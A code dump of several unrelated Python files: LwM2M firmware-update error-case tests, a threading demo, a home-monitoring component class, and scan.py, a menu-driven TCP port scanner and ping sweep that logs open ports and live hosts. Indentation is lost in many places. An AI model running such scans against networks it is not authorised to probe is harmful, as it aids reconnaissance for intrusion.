# 3. The firmware downloading process is running. The Server sends
# repeated READs or OBSERVE on State and Update Result
# Resources (CoAP GET /5/0) of the FW Update Object Instance
# to determine when the download is completed or if an error
# occurred. Before the end of download, the device runs out of
# storage and cannot finish the download
# 4. When the Package delivery is stopped the server READs Update
# Result to know the result of the firmware update procedure.
#
# C. In test step 3., the State Resource retrieved with a value of "1" from
# successive Server READs or Client NOTIFY messages, indicates the
# download stage of the Package Delivery is engaged
# D. In test step 3., the Update Result Resource (/5/0/5) retrieved from
# successive Server READs or Client NOTIFY messages will take the
# value "2" indicating an error occurred during the downloading
# process related to shortage of storage memory. The State Resource
# value never reaches the Downloaded value ("2")
# E. In test step 4., the success READ message(s) (status code "2.05"
# Content) on State Resource with value "0" (Idle) and Update Result
# Resource with value "2" indicates the firmware Package Delivery
# aborted due to shortage of storage.
observed_values = self.collect_values(ResPath.FirmwareUpdate.State, b'0')
self.assertEqual(b'0', observed_values[-1])
self.assertEqual({b'0', b'1'}, set(observed_values))
self.assertEqual(b'2', self.test_read(ResPath.FirmwareUpdate.UpdateResult))
class Test774_FirmwareUpdate_ErrorCase_OutOfMemory(FirmwareUpdate.Test):
def runTest(self):
demo_executable = os.path.join(self.config.demo_path, self.config.demo_cmd)
with open(demo_executable, 'rb') as f:
payload = f.read()
# 1. The Server verifies through a READ (CoAP GET) command on
# /5/0/3 (State) the FW Update Object Instance of the Client is in Idle
# State
#
# A. In test step 1, the Server receives the status code "2.05" (Content) for
# the READ success command, along with the State Resource value of
# "0" (Idle)
self.assertEqual(b'0', self.test_read(ResPath.FirmwareUpdate.State))
# 2. The Server delivers the firmware package to the Client either through
# a WRITE (CoAP PUT) operation in the Package Resource (/5/0/0) or
# through a WRITE operation of an URI in the Package URI Resource.
#
# B. In test step 2., the Server receives the status code "2.04" (Changed)
# for the WRITE command setting either the Package URI Resource or
# setting the Package Resource, according to the chosen firmware
# delivery method.
self.test_write_block(ResPath.FirmwareUpdate.Package,
make_firmware_package(payload, force_error=FirmwareUpdateForcedError.OutOfMemory),
coap.ContentFormat.APPLICATION_OCTET_STREAM)
# 3. The firmware download process is running. The Server sends repeated
# READs or OBSERVE on State and Update Result Resources (CoAP
# GET /5/0) of the FW Update Object Instance to determine when the
# download is completed or if an error occurred. Before the end of
# download, the Client runs out of RAM and cannot finish the
# download
# 4. When the Package delivery is stopped the server READs Update
# Result to know the result of the firmware update procedure.
#
# C. In test step 3., the State Resource retrieved with a value of "1" from
# successive Server READs or Client NOTIFY messages, indicates the
# download stage of the Package Delivery is engaged
# D. In test step 3., the Update Result Resource (/5/0/5) retrieved from
# successive Server READs or Client NOTIFY messages will take the
# value "2" indicating an error occurred during the download process
# related to shortage of RAM The State Resource value never reaches
# the Downloaded value ("3")
# E. In test step 4., the success READ message(s) (status code "2.05"
# Content) on State Resource with value "0" (Idle) and Update Result
# Resource with value "3" indicates the firmware Package Delivery
# aborted due to shortage of RAM.
self.assertEqual(b'0', self.test_read(ResPath.FirmwareUpdate.State))
self.assertEqual(b'3', self.test_read(ResPath.FirmwareUpdate.UpdateResult))
class FirmwareUpdate_ErrorCase_OutOfMemory_PackageURI(FirmwareUpdateWithHttpServer.Test):
def setUp(self):
demo_executable = os.path.join(self.config.demo_path, self.config.demo_cmd)
with open(demo_executable, 'rb') as f:
pkg = make_firmware_package(f.read(), force_error=FirmwareUpdateForcedError.OutOfMemory)
super().setUp(pkg)
def runTest(self):
# Test 774, but with Package URI
self.assertEqual(b'0', self.test_read(ResPath.FirmwareUpdate.UpdateResult))
self.test_write(ResPath.FirmwareUpdate.PackageURI, self.get_firmware_uri())
observed_values = self.collect_values(ResPath.FirmwareUpdate.State, b'0')
self.assertEqual(b'0', observed_values[-1])
self.assertEqual({b'0', b'1'}, set(observed_values))
self.assertEqual(b'3', self.test_read(ResPath.FirmwareUpdate.UpdateResult))
class Test775_FirmwareUpdate_ErrorCase_ConnectionLostDuringDownloadPackageURI(FirmwareUpdateWithHttpServer.Test):
class NoShutdownHttpServer(http.server.HTTPServer):
def shutdown_request(self, request):
pass
def close_request(self, request):
pass
HTTP_SERVER_CLASS = NoShutdownHttpServer
def during_download(self, req_handler):
self._dangling_http_socket = req_handler.request
# HACK to ignore any calls on .wfile afterwards
req_handler.wfile = ANY
def setUp(self):
self._dangling_http_socket = None
demo_executable = os.path.join(self.config.demo_path, self.config.demo_cmd)
with open(demo_executable, 'rb') as f:
pkg = make_firmware_package(f.read(), force_error=FirmwareUpdateForcedError.OutOfMemory)
super().setUp(pkg)
def tearDown(self):
try:
if self._dangling_http_socket is not None:
self._dangling_http_socket.close()
finally:
super().tearDown()
def runTest(self):
# 1. The Server verifies through a READ (CoAP GET) command on
# /5/0/3 (State) the FW Update Object Instance of the Client is in Idle
# State
#
# A. In test step 1., the Server receives the status code "2.05" (Content)
# for the READ success command, along with the State Resource value
# of "0" (Idle)
self.assertEqual(b'0', self.test_read(ResPath.FirmwareUpdate.State))
# 2. The Server delivers the firmware package to the Client through a
# WRITE operation of a URI in the Package URI Resource.
#
# B. In test step 2., the Server receives the status code "2.04" (Changed)
# for the WRITE command setting the Package URI Resource
# according to the PULL firmware delivery method.
self.test_write(ResPath.FirmwareUpdate.PackageURI, self.get_firmware_uri())
# 3. The Server sends repeated READs or OBSERVE on State and Update
# Result Resources (CoAP GET /5/0) of the FW Update Object
# Instance to determine when the download is completed or if an error
# occurred. Before the end of download, the connection is intentionally
# lost and the download cannot be finished.
# 4. When the Package delivery is stopped the Server READs Update
# Result to know the result of the firmware update procedure.
#
# C. In test step 3., the State Resource value set to "1" retrieved from
# successive Server READs or Client NOTIFY messages, indicates the
# Package Delivery process is engaged in a Download stage
# D. In test step 3., the Update Result Resource (/5/0/5) retrieved from
# successive Server READs or Client NOTIFY messages will take the
# value "4" indicating an error occurred during the downloading
# process related to connection lost
# E. In test step 4., the success READ message(s) (status code "2.05"
# Content) on State Resource with value "0" (Idle) and Update Result
# Resource with value "4" indicates the firmware Package Delivery
# aborted due to connection loss during the Package delivery.
observed_values = self.collect_values(ResPath.FirmwareUpdate.State, b'0',
max_iterations=600) # wait up to 60 seconds
self.assertEqual(b'0', observed_values[-1])
self.assertEqual({b'0', b'1'}, set(observed_values))
self.assertEqual(b'4', self.test_read(ResPath.FirmwareUpdate.UpdateResult))
class Test775_FirmwareUpdate_ErrorCase_ConnectionLostDuringDownloadPackageURI_CoAP(FirmwareUpdate.TestWithCoapServer):
def setUp(self):
demo_executable = os.path.join(self.config.demo_path, self.config.demo_cmd)
with open(demo_executable, 'rb') as f:
pkg = make_firmware_package(f.read(), force_error=FirmwareUpdateForcedError.OutOfMemory)
class MuteServer(coap.Server):
def send(self, *args, **kwargs):
pass
super().setUp(coap_server=MuteServer(), extra_cmdline_args=['--fwu-ack-timeout', '1'])
with self.file_server as file_server:
file_server.set_resource('/firmware', pkg)
self._uri = file_server.get_resource_uri('/firmware')
def runTest(self):
# 1. The Server verifies through a READ (CoAP GET) command on
# /5/0/3 (State) the FW Update Object Instance of the Client is in Idle
# State
#
# A. In test step 1., the Server receives the status code "2.05" (Content)
# for the READ success command, along with the State Resource value
# of "0" (Idle)
self.assertEqual(b'0', self.test_read(ResPath.FirmwareUpdate.State))
# 2. The Server delivers the firmware package to the Client through a
# WRITE operation of a URI in the Package URI Resource.
#
# B. In test step 2., the Server receives the status code "2.04" (Changed)
# for the WRITE command setting the Package URI Resource
# according to the PULL firmware delivery method.
self.test_write(ResPath.FirmwareUpdate.PackageURI, self._uri)
# 3. The Server sends repeated READs or OBSERVE on State and Update
# Result Resources (CoAP GET /5/0) of the FW Update Object
# Instance to determine when the download is completed or if an error
# occurred. Before the end of download, the connection is intentionally
# lost and the download cannot be finished.
# 4. When the Package delivery is stopped the Server READs Update
# Result to know the result of the firmware update procedure.
#
# C. In test step 3., the State Resource value set to "1" retrieved from
# successive Server READs or Client NOTIFY messages, indicates the
# Package Delivery process is engaged in a Download stage
# D. In test step 3., the Update Result Resource (/5/0/5) retrieved from
# successive Server READs or Client NOTIFY messages will take the
# value "4" indicating an error occurred during the downloading
# process related to connection lost
# E. In test step 4., the success READ message(s) (status code "2.05"
# Content) on State Resource with value "0" (Idle) and Update Result
# Resource with value "4" indicates the firmware Package Delivery
# aborted due to connection loss during the Package delivery.
observed_values = self.collect_values(ResPath.FirmwareUpdate.State, b'0',
max_iterations=50, step_time=1)
self.assertEqual(b'0', observed_values[-1])
self.assertEqual({b'0', b'1'}, set(observed_values))
self.assertEqual(b'4', self.test_read(ResPath.FirmwareUpdate.UpdateResult))
class Test776_FirmwareUpdate_ErrorCase_CRCCheckFail(FirmwareUpdate.Test):
def runTest(self):
demo_executable = os.path.join(self.config.demo_path, self.config.demo_cmd)
with open(demo_executable, 'rb') as f:
payload = f.read()
# 1. The Server verifies through a READ (CoAP GET) command on
# /5/0/3 (State) the FW Update Object Instance of the Client is in Idle
# State
#
# A. In test step 1, the Server receives the status code "2.05" (Content) for
# the READ success command, along with the State Resource value of
# "0" (Idle)
self.assertEqual(b'0', self.test_read(ResPath.FirmwareUpdate.State))
# 2. The Server delivers the firmware package to the Client either through
# a WRITE (CoAP PUT) operation in the Package Resource (/5/0/0) or
# through a WRITE operation of a URI in the Package URI Resource.
#
# B. In test step 2., the Server receives the status code "2.04" (Changed)
# for the WRITE command setting either the Package URI Resource or
# setting the Package Resource, according to the chosen firmware
# delivery method.
self.test_write_block(ResPath.FirmwareUpdate.Package,
make_firmware_package(payload, crc=0),
coap.ContentFormat.APPLICATION_OCTET_STREAM)
# 3. The Server sends repeated READs or OBSERVE on State and Update
# Result Resources (CoAP GET /5/0) of the FW Update Object
# Instance to determine when the download is completed or if an error
# occurred. The firmware package Integrity Check failure stopped the
# download process.
# 4. When the Package delivery is stopped the server READs Update
# Result to know the result of the firmware update procedure.
#
# C. In test step 3., the State Resource value set to "1" retrieved from
# successive Server READs or Client NOTIFY messages, indicates the
# Package Delivery process is maintained in Downloading stage
# D. In test step 3., the Update Result Resource (/5/0/5) retrieved from
# successive Server READs or Client NOTIFY messages will take the
# value "5" indicating an error occurred during the downloading
# process related to the failure of the firmware package integrity check
# E. In test step 4., the success READ message(s) (status code "2.05"
# Content) on State Resource with value "0" (Idle) and Update Result
# Resource with value "5" indicates the firmware Package Delivery
# aborted due to a Firmware Package Integrity failure.
self.assertEqual(b'0', self.test_read(ResPath.FirmwareUpdate.State))
self.assertEqual(b'5', self.test_read(ResPath.FirmwareUpdate.UpdateResult))
class FirmwareUpdate_ErrorCase_CRCCheckFail_PackageURI(FirmwareUpdateWithHttpServer.Test):
def setUp(self):
demo_executable = os.path.join(self.config.demo_path, self.config.demo_cmd)
with open(demo_executable, 'rb') as f:
pkg = make_firmware_package(f.read(), crc=0)
super().setUp(pkg)
def runTest(self):
# Test 776, but with Package URI
self.assertEqual(b'0', self.test_read(ResPath.FirmwareUpdate.UpdateResult))
self.test_write(ResPath.FirmwareUpdate.PackageURI, self.get_firmware_uri())
observed_values = self.collect_values(ResPath.FirmwareUpdate.State, b'0')
self.assertEqual(b'0', observed_values[-1])
self.assertEqual({b'0', b'1'}, set(observed_values))
self.assertEqual(b'5', self.test_read(ResPath.FirmwareUpdate.UpdateResult))
class Test777_FirmwareUpdate_ErrorCase_UnsupportedPackageType(FirmwareUpdate.Test):
def runTest(self):
# 1. The Server verifies through a READ (CoAP GET) command on
# /5/0/3 (State) the FW Update Object Instance of the Client is in Idle
# State
#
# A. In test step 1, the Server receives the status code "2.05" (Content) for
# the READ success command, along with the State Resource value of
# "0" (Idle)
self.assertEqual(b'0', self.test_read(ResPath.FirmwareUpdate.State))
# 2. The Server delivers the firmware package to the Client either through
# a WRITE (CoAP PUT) operation in the Package Resource (/5/0/0) or
# through a WRITE operation of a URI in the Package URI Resource.
#
# B. In test step 2., the Server receives the status code "2.04" (Changed)
# for the WRITE command setting either the Package URI Resource or
# setting the Package Resource, according to the chosen firmware
# delivery method.
self.test_write(ResPath.FirmwareUpdate.Package, b'A' * 1024,
format=coap.ContentFormat.APPLICATION_OCTET_STREAM)
# 3. The Server sends repeated READs or OBSERVE on State and Update
# Result Resources (CoAP GET /5/0) of the FW Update Object
# Instance to determine when the download is completed or if an error
# occurred. The Download cannot be finished since the firmware
# package type is not supported by the Client
# 4. When the Package delivery is stopped the server READs Update
# Result to know the result of the firmware update procedure.
#
# C. In test step 3., the State Resource value set to "1" retrieved from
# successive Server READs or Client NOTIFY messages, indicates the
# Package Delivery process is in Downloading stage
# D. In test step 3., the Update Result Resource (/5/0/5) retrieved from
# successive Server READs or Client NOTIFY messages will take the
# value "6" indicating an error occurred during the downloading
# process related to the firmware package type not supported by the
# Client.
# E. In test step 4., the success READ message(s) (status code "2.05"
# Content) on State Resource with value "1" (Downloading) and
# Update Result Resource with value "6" indicates the firmware Package
# Delivery aborted due to a firmware package type not supported by the
# Client.
self.assertEqual(b'0', self.test_read(ResPath.FirmwareUpdate.State))
self.assertEqual(b'6', self.test_read(ResPath.FirmwareUpdate.UpdateResult))
class FirmwareUpdate_ErrorCase_UnsupportedPackageType_PackageURI(FirmwareUpdateWithHttpServer.Test):
def setUp(self):
super().setUp(b'A' * 1024)
def runTest(self):
# Test 777, but with Package URI
self.assertEqual(b'0', self.test_read(ResPath.FirmwareUpdate.UpdateResult))
self.test_write(ResPath.FirmwareUpdate.PackageURI, self.get_firmware_uri())
observed_values = self.collect_values(ResPath.FirmwareUpdate.State, b'0')
self.assertEqual(b'0', observed_values[-1])
self.assertEqual({b'0', b'1'}, set(observed_values))
self.assertEqual(b'6', self.test_read(ResPath.FirmwareUpdate.UpdateResult))
class Test778_FirmwareUpdate_ErrorCase_InvalidURI(FirmwareUpdate.Test):
def runTest(self):
# 1. The Server verifies through a READ (CoAP GET) command on
# /5/0/3 (State) the FW Update Object Instance of the Client is in Idle
# State
#
# A. In test step 1, the Server receives the status code "2.05" (Content) for
# the READ success command, along with the State Resource value of
# "0" (Idle)
self.assertEqual(b'0', self.test_read(ResPath.FirmwareUpdate.State))
# 2. The Server initiates a firmware package delivery to the Client through
# a WRITE operation of an invalid URI in the Package URI Resource.
#
# B. In test step 2., the Server receives the status code "2.04" (Changed)
# for the WRITE command setting the Package URI Resource
self.test_write(ResPath.FirmwareUpdate.PackageURI,
'http://mylovelyfwserver/')
# 3. The Server sends repeated READs or OBSERVE on State and Update
# Result Resources (CoAP GET /5/0) of the FW Update Object
# Instance to determine when the download is completed or if an error
# occurred. The download process is stopped by the Client due to the
# usage of a bad URI.
# 4. When the Package delivery is stopped the server READs Update
# Result to know the result of the firmware update procedure.
# C. In test step 3., the State Resource value set to "1" retrieved from
# successive Server READs or Client NOTIFY messages, indicates the
# Package Delivery process is maintained in Downloading stage
# D. In test step 3., the Update Result Resource (/5/0/5) retrieved from
# successive Server READs or Client NOTIFY messages will take the
# value "7" indicating an error occurred during the downloading
# process related to the usage of a bad URI
# E. In test step 4., the success READ message(s) (status code "2.05"
# Content) on State Resource with value "0" (Idle) and Update Result
# Resource with value "7" indicates the firmware Package Delivery
# aborted due to the connection to an Invalid URI for the firmware
# package delivery.
observed_values = self.collect_values(ResPath.FirmwareUpdate.State, b'0')
self.assertEqual(b'0', observed_values[-1])
# TODO? client does not report "Downloading" state
# self.assertEqual({b'0', b'1'}, set(observed_values))
self.assertEqual({b'0'}, set(observed_values))
self.assertEqual(b'7', self.test_read(ResPath.FirmwareUpdate.UpdateResult))
class Test779_FirmwareUpdate_ErrorCase_UnsuccessfulFirmwareUpdate(FirmwareUpdate.Test):
def runTest(self):
demo_executable = os.path.join(self.config.demo_path, self.config.demo_cmd)
with open(demo_executable, 'rb') as f:
payload = f.read()
prev_version = self.test_read(ResPath.Device.FirmwareVersion)
# 1. Step 1 - Package Delivery
# a. The Server verifies through a READ (CoAP GET) command on
# /5/0/3 (State) the FW Update Object Instance of the Client is in Idle
# State
#
# A. Package Delivery
# a. In test step 1.a, the Server receives the status code "2.05" (Content)
# for the READ success command, along with the State Resource value
# of "0" (Idle)
self.assertEqual(b'0', self.test_read(ResPath.FirmwareUpdate.State))
# 1. Step 1 - Package Delivery
# b. The Server retrieves (CoAP GET) the initial value of the Firmware
# Version Resource from the Object Device Instance for verification in
# the Pass Criteria (C)
#
# A. Package Delivery
# b. In test step 1.b, the Server receives the status code "2.05" (Content)
# for the READ success command, along with the initial value of the
# Firmware version Resource available from the Object Device
# Instance.
prev_version = self.test_read(ResPath.Device.FirmwareVersion)
# 1. Step 1 - Package Delivery
# c. The Server delivers the firmware package to the Client either
# through a WRITE (CoAP PUT) operation in the Package Resource
# (/5/0/0) or through a WRITE operation of a URI in the Package URI
# Resource.
#
# A. Package Delivery
# c. In test step 1.c, the Server receives the status code "2.04" (Changed)
# for the WRITE command setting either the Package URI Resource or
# setting the Package Resource, according to the chosen firmware
# delivery method.
self.test_write_block(ResPath.FirmwareUpdate.Package,
make_firmware_package(payload, force_error=FirmwareUpdateForcedError.FailedUpdate),
coap.ContentFormat.APPLICATION_OCTET_STREAM)
# 1. Step 1 - Package Delivery
# d. Polling (successive READ commands) or Notification on Update
# Result and State Resources is performed, up to the time State
# Resource takes the "Downloaded" value (2)
#
# A. Package Delivery
# d. At the end of test step 1.d, the State Resource takes the value "2"
# (Downloaded)
self.assertEqual(b'2', self.test_read(ResPath.FirmwareUpdate.State))
# 2. Step 2 - Installation Failure
# a. When the download is completed (State Resource value is "2"
# Downloaded), the Server initiates a firmware update by triggering
# EXECUTE command on Update Resource (CoAP POST /5/0/2)
#
# B. Installation failure
# a. In test step 2.a, the Server receives a success message "2.04"
# (Changed) in response to the EXECUTE command
self.test_execute(ResPath.FirmwareUpdate.Update)
# 2. Step 2 - Installation Failure
# b. Polling (READ command) or Notification on Update Result and
# State Resources is performed, up to the time State Resource is
# turned back to 2 (Downloaded) or the Update Result Resource
# contains the value "8" (Firmware update failed )
#
# B. Installation failure
# b. In test step 2.b, the Server receives success message(s) "2.05"
# Content along with a State Resource value of "3" (Updating) or "2"
# (Downloaded) and an Update Result Resource value of "0" (Initial Value)
# and "8" at the end (Firmware update failed)
observed_values = self.collect_values(ResPath.FirmwareUpdate.State, b'2')
self.assertEqual(b'2', observed_values[-1])
# state == 3 may or may not be observed
self.assertTrue(set(observed_values).issubset({b'2', b'3'}))
self.assertEqual(b'8', self.test_read(ResPath.FirmwareUpdate.UpdateResult))
# 3. Step 3 - Process Verification
# a. The server READs Update Result & State Resources to know the
# result of the firmware update procedure.
#
# C. Process Verification
# a. In test step 3.a, the Server receives success message(s) "2.05"
# (Content) along with a State Resource value of "2" (Downloaded) and
# an Update Result Resource value of "8" (Firmware update failed)
self.assertEqual(b'2', self.test_read(ResPath.FirmwareUpdate.State))
self.assertEqual(b'8', self.test_read(ResPath.FirmwareUpdate.UpdateResult))
# 3. Step 3 - Process Verification
# b. The Server READs the Firmware Version Resource from the
# Object Device Instance
#
# C. Process Verification
# b. In test step 3.b the Server receives success message(s) "2.05"
# (Content) along with a Firmware Version Resource value from the Object
# Device Instance which has not changed compared to the one retrieved
# in Pass Criteria A.b
self.assertEqual(prev_version, self.test_read(ResPath.Device.FirmwareVersion))
class FirmwareUpdate_ErrorCase_UnsuccessfulFirmwareUpdate_PackageURI(FirmwareUpdateWithHttpServer.Test):
def setUp(self):
demo_executable = os.path.join(self.config.demo_path, self.config.demo_cmd)
with open(demo_executable, 'rb') as f:
pkg = make_firmware_package(f.read(), force_error=FirmwareUpdateForcedError.FailedUpdate)
super().setUp(pkg)
def runTest(self):
# Test 779, but with Package URI
self.assertEqual(b'0', self.test_read(ResPath.FirmwareUpdate.UpdateResult))
prev_version = self.test_read(ResPath.Device.FirmwareVersion)
self.test_write(ResPath.FirmwareUpdate.PackageURI, self.get_firmware_uri())
observed_values = self.collect_values(ResPath.FirmwareUpdate.State, b'2')
self.assertEqual(b'2', observed_values[-1])
self.assertEqual({b'1', b'2'}, set(observed_values))
req = Lwm2mExecute(ResPath.FirmwareUpdate.Update)
self.serv.send(req)
self.assertMsgEqual(Lwm2mChanged.matching(req)(),
self.serv.recv())
observed_values = self.collect_values(ResPath.FirmwareUpdate.State, b'2')
self.assertEqual(b'2', observed_values[-1])
# state == 3 may or may not be observed
self.assertTrue(set(observed_values).issubset({b'2', b'3'}))
self.assertEqual(b'8', self.test_read(ResPath.FirmwareUpdate.UpdateResult))
self.assertEqual(prev_version, self.test_read(ResPath.Device.FirmwareVersion))
|
scan.py | #!/usr/bin/env python3
#import curses #for console interface...soon
from socket import *
import time
import os
import multiprocessing
import subprocess
import csv
from datetime import datetime
def check_history():
    # Create session.csv with a timestamp row if it does not exist yet.
    try:
        with open('session.csv', 'r', newline=''):
            pass
    except OSError:
        with open('session.csv', 'a', newline='') as csvfile:
            filewriter = csv.writer(csvfile, delimiter=',',
                                    quotechar='|', quoting=csv.QUOTE_MINIMAL)
            filewriter.writerow([datetime.now()])
def show_history():
    try:
        with open('session.csv') as f:
            for row in csv.reader(f):
                print(row)
    except OSError:
        pass  # no history recorded yet
def write_history(action, data):
    with open('session.csv', 'a', newline='') as csvfile:
        filewriter = csv.writer(csvfile, delimiter=',',
                                quotechar='|', quoting=csv.QUOTE_MINIMAL)
        filewriter.writerow([action, data])
def socket_Scan(targetIP, write_history):
    dt = datetime.now()
    timer = time.time()
    host = gethostbyname(targetIP)
    action = '-------------------Port Scan--------------------- \n'
    write_history(action, dt)
    print('Scanning...')
    for i in range(1, 65536):  # valid TCP ports are 1-65535
        soc = socket(AF_INET, SOCK_STREAM)
        connect = soc.connect_ex((host, i))  # 0 means the connect succeeded, i.e. the port is open
        if connect == 0:
            print('Port %d: ->[OPEN]' % (i,))
            data = 'Port %d: ->[OPEN]' % (i,)
            write_history('', data)
        soc.close()
    time_taken = time.time() - timer
    write_history('time taken =', time_taken)
    print('time taken = ', time_taken)
def ping_Sweep(job_q, results_q):
DEVNULL = open(os.devnull, 'w')
while True:
ip = job_q.get()
if ip is None:
break
try:
    subprocess.check_call(['ping', '-c1', ip],
                          stdout=DEVNULL)
    results_q.put(ip)
except subprocess.CalledProcessError:
    pass  # host did not reply to the ping
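# ping_Sweep above follows the usual sentinel-terminated worker pattern:
# each process pulls addresses from job_q until it sees None, pings each
# one once ('-c1' is the Unix ping flag; on Windows it would be '-n 1'),
# and reports reachable hosts through results_q.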
def menu():
print("""
|\ o
| \ o
|\ / .\ o
| | ( ======[finding-PORTy v1.]======
|/ \ /
| /
|/
""")
print('\n')
print('===[OPTIONS]=== \n [1] Scan Open Ports \n [2] Ping Sweep Live Host (Loud) \n [3] TCP Scan (Stealth) \n [4] Show Activities \n [5] Remove History \n [0] Exit')
while(True):
action = input('Action: ')
if(action == '1'):
targetIP = input('===[Scan Open Ports]=== \n Enter IP: ')
check_history()
socket_Scan(targetIP, write_history)
elif(action == '2'):
check_history()
action = '-------------------Ping Sweep Live Host--------------------- \n'
data = 'Scanning'
write_history(action, data)
size = int(input('===[Ping Sweep Live Host]=== \n Enter Range(1 to ?): '))
targetNetwork = input('\n Enter Network IP: ')
splitIP = targetNetwork.split('.')
x = '.'
jobs = multiprocessing.Queue()
results = multiprocessing.Queue()
pool = [multiprocessing.Process(target=ping_Sweep, args=(jobs, results))
for i in range(size) ]
for p in pool:
p.start()
for i in range(1, size + 1):  # cover hosts 1..size inclusive
    fnetwork = splitIP[0] + x + splitIP[1] + x + splitIP[2] + x + str(i)  # rebuild a.b.c.i from the network IP
jobs.put(fnetwork)
for p in pool:
jobs.put(None)
for p in pool:
p.join()
while not results.empty():
liveIP = results.get()
data = liveIP,'---> we got a live one!'
dateTime = datetime.now()
write_history(dateTime, data)
print(liveIP, '---> we got a live one!')
elif(action == '3'):
print('will add soon...')
elif(action == '4'):
show_history()
elif(action == '5'):
print('will add soon...')
elif(action == '0'):
exit(0)
else:
print('incorrect option...')
if __name__ == '__main__':
menu()
|
addHugeRange_single_vs_multi.py | import threading
import time

result_lock = threading.Lock()  # protects the shared 'result' counter
def add(r):
    global result
    res = 0
    for i in r:
        res += i
    with result_lock:  # '+=' on a global is a non-atomic read-modify-write
        result += res
#################################################
# Sequential Processing:
#################################################
t = time.time()
result = 0
add(range(500_000))
add(range(500_000, 1_000_000))
print("Sequential Processing result: ", result)
print("Sequential Processing took:",time.time() - t,"\n")
#################################################
# Multithreaded Processing:
#################################################
t = time.time()
result = 0
#create threads
tr1 = threading.Thread(name="tr1", target=add, args=(range(50_000_00),))
tr2 = threading.Thread(name="tr2", target=add, args=(range(50_000_00,100_000_00),))
# start threads
tr1.start(); tr2.start()
# wait threads to finish their job
tr1.join(); tr2.join()
print("Multithreaded Processing result: ", result)
print("Multithreaded Processing took:",time.time() - t,"\n") |
Component.py | """
Home-Monitor:
AI system for the detection of anomalous and possibly harmful events for people.
Written by Gabriel Rojas - 2019
Copyright (c) 2019 G0 S.A.S.
See LICENSE file for details
Class information:
Class to represent any extensible component
"""
import sys
from os.path import normpath
from multiprocessing import Process
import abc
import hashlib
import Misc
from DataPool import SourceTypes, LogTypes, Messages, Data, Binnacle, CommPool
class Component():
""" Class to represent any extensible component """
ME_NAME:str = None
ME_TYPE:SourceTypes = None
ME_PATH:str = None
ME_CONFIG = None
ME_CONFIG_PATH:str = None
ME_FILE_CLASS:str = None
ME_CLASS_NAME:str = None
ME_ENABLED:bool = False
ME_LOADED:bool = False
ME_STANDALONE:bool = False
CP:CommPool = None
BC:Binnacle = Binnacle()
Check:str = '' # Hash of config file
Thread:Process = None # Process in which the component executes
Running:bool = False # Shows if component is executing
Simulating:bool = False # Flag to control if data is simulated from a file
SimulatingPath:str = None # Path to simulating file
loggingLevel:LogTypes = LogTypes.INFO # Level of logging
def __init__(self, path="./", cp:CommPool=None):
""" Build a new component un memory """
self.ME_PATH = path
self.CP = cp
def init_standalone(self, path="./", config=None):
""" Start the component isolated of system """
self.ME_PATH = path # Path of current component
self.ME_STANDALONE = True
if not Misc.existsFile("config.yaml", self.ME_PATH):
raise ValueError(Messages.config_no_file)
self.ME_CONFIG_PATH = normpath(self.ME_PATH + "/config.yaml")
self.ME_CONFIG = Misc.readConfig(self.ME_CONFIG_PATH) if config == None else config
self.CP = CommPool(self.ME_CONFIG, standAlone=True)
self.load()
def load(self, forceLoad:bool=False):
""" Loads the component """
self.ME_LOADED = False
try:
if not Misc.existsFile("config.yaml", self.ME_PATH):
raise ValueError(Messages.config_no_file)
self.ME_CONFIG_PATH = normpath(self.ME_PATH + "/config.yaml")
self.ME_CONFIG = Misc.readConfig(self.ME_CONFIG_PATH)
new_check = hashlib.md5(str(self.ME_CONFIG).encode('utf-8')).hexdigest()
if new_check == self.Check:
return
self.Check = new_check
self.log(Messages.comp_try_start.format(self.ME_PATH), LogTypes.INFO)
self.ME_NAME = Misc.hasKey(self.ME_CONFIG, 'NAME', self.ME_PATH)
self.ME_TYPE = SourceTypes.parse(Misc.hasKey(self.ME_CONFIG, 'TYPE', None))
self.ME_ENABLED = Misc.toBool(Misc.hasKey(self.ME_CONFIG, 'ENABLED', 'False'))
if self.Thread != None:
self.Thread.terminate()
self.Thread = None
self.log(Messages.comp_change.format(self.ME_PATH, ('reload' if self.ME_ENABLED else 'stopped')), LogTypes.INFO)
if not self.ME_ENABLED:
return
self.ME_FILE_CLASS = Misc.hasKey(self.ME_CONFIG, 'FILE_CLASS', None)
if self.ME_FILE_CLASS == None:
raise ValueError(Messages.error_file_class)
self.ME_CLASS_NAME = Misc.hasKey(self.ME_CONFIG, 'CLASS_NAME', None)
if self.ME_CLASS_NAME == None:
raise ValueError(Messages.error_class_name)
self.Simulating = Misc.toBool(Misc.hasKey(self.ME_CONFIG, 'SIMULATING', 'False'))
self.SimulatingPath = Misc.hasKey(self.ME_CONFIG, 'SIMULATING_PATH', '')
if self.Simulating:
self.setSimulatedMode(self.Simulating, self.SimulatingPath)
_cls = Misc.importModule(self.ME_PATH, self.ME_FILE_CLASS, self.ME_CLASS_NAME)
obj = _cls()
obj.ME_NAME = self.ME_NAME
obj.ME_TYPE = self.ME_TYPE
obj.ME_PATH = self.ME_PATH
obj.ME_CONFIG = self.ME_CONFIG
obj.ME_CONFIG_PATH = self.ME_CONFIG_PATH
obj.ME_FILE_CLASS = self.ME_FILE_CLASS
obj.ME_CLASS_NAME = self.ME_CLASS_NAME
obj.ME_ENABLED = self.ME_ENABLED
obj.ME_LOADED = True
obj.ME_STANDALONE = self.ME_STANDALONE
obj.CP = self.CP
obj.BC = self.BC
obj.Check = self.Check
obj.Running = self.Running
obj.Simulating = self.Simulating
obj.SimulatingPath = self.SimulatingPath
obj.loggingLevel = self.loggingLevel
DeviceControllerThread = Process(target=obj.start, args=())
DeviceControllerThread.start()
self.Thread = DeviceControllerThread
del _cls, obj
self.ME_LOADED = True
self.log(Messages.comp_started.format(self.ME_NAME), LogTypes.INFO)
print(self.ME_NAME, 'loaded.')
except Exception:
self.log(Messages.comp_load_error, LogTypes.ERROR)
def checkConnection(self):
""" Verify connection with pool """
return self.CP.isLive()
def log(self, msg:str, logType:LogTypes, item:str=''):
""" Allows send message to Binnacle """
dataLog = Data()
dataLog.source_type = self.ME_TYPE
dataLog.source_name = self.ME_NAME
dataLog.source_item = item
dataLog.data = '{}'.format(msg)
dataLog.aux = self.__class__.__name__
if logType.value > LogTypes.WARNING.value:
exc_type, exc_obj, exc_tb = sys.exc_info()
fname = exc_tb.tb_frame.f_code.co_filename
dataLog.data += ' == {} :: {} :: {} :: {}'.format(exc_obj, exc_type, fname, exc_tb.tb_lineno)
self.BC.logFromComponent(dataLog, logType)
if not self.ME_STANDALONE:
self.CP.logFromComponent(dataLog, logType)
def setLoggingSettings(self, loggingLevel:LogTypes=LogTypes.INFO, loggingFile=None, loggingFormat=None):
""" set logging configurations """
self.loggingLevel = loggingLevel
